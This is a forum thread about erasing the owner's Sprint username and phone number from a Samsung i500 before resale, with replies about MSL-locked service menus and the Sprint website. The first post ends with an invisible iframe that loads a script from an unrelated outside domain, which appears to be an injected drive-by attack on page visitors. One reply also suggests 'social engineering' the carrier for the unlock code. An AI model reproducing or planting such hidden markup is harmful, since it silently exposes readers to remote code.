+ Reply to Thread

How can I change the username or phone number that is displayed on the i500?

I have put my i500 on ebay, I did a hard reset to erase all the data on it, but my phone number and username-email still shows up on it. How can I erase or change it before I ship it to the buyer?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: How can I change the username or phone number that is displayed on the i500?

Originally posted by PhoneMan
    I have put my i500 on ebay, I did a hard reset to erase all the data on it, but my phone number and username-email still shows up on it. How can I erase or change it before I ship it to the buyer?
    not sure, but I think this is all contained in the MSL-lock pages. So if you've saved the MSL from when Sprint first provisioned your phone, use that to get into the device to erase the data. If not, well, then you have to do the "social engineering" to get the MSL from Sprint.

You might be able to try doing a reset from the ##786 page. Just press the shiny ClearReset button... and tell us what it does. Or maybe not. Does anyone know if this would damage the phone in any way? I don't think it would, but of course do it at your own risk.

You need to go online and edit that info in your sprintpcs.com email setup. It lets you change your username and password. Changing your user name will change your email address. Once it's changed, it should automatically reprogram your phone with the new name etc. Be careful, I once did it and had to call CS to send the programming to my phone manually.

Originally posted by phaggard
    You need to go online and edit that info in your sprintpcs.com email setup. It lets you change your username and password. Changing your user name will change your email address. Once it's changed, it should automatically reprogram your phone with the new name etc. Be careful, I once did it and had to call CS to send the programming to my phone manually.
    well yes, of course that is the normal way to do this. but the original poster is trying to prep the phone prior to selling it, ergo, he doesn't want any valid info in the I500 and moreover may not even have a Sprint account anymore.

in which case, you must go in with the MSL to the programming pages of the I500 (##3282 OK) and delete/edit the phone's copy of the data, not data on Sprint's servers/website.

Administrator
    that info needs to be changed at the website. the msl will not alter this info as its sent via the vision network. the orginal poster can put up a dummy username and email on the site and ocne the new users gets the phone and provision it, his/her info will then be displayed.

The original poster was unclear as to whether his I500 was still provisioned for Vision and Sprint PCS. If it is, yes, of course, he can changed this info on the website. But it is not "dummy" info. It is real and the new address created will also be real and be tied to the poster's account.

If the I500 is no longer provisioned for Vision and on Sprint, then there is no access to the website to begin with.

The MSL pages do permit the editing of the Vision email address and passwords *as the phone knows them*. It would of course be overwritten by Sprint's Vision servers if the phone is still provisioned. I would presume that if the phone is off Sprint then entered info into the phone itself (on the MSL pages) would not be touched. I could be wrong...

Administrator
    what i meant in regards to "dummy" email is that he can setup an email address that he will not use. of course it will still be tied to his account as long as the phone is in his name. assuming the receipent of the phone is going to activate it, then his new info will be finally tied to the phone.

but, as long as the poster cuts off service then he is safe.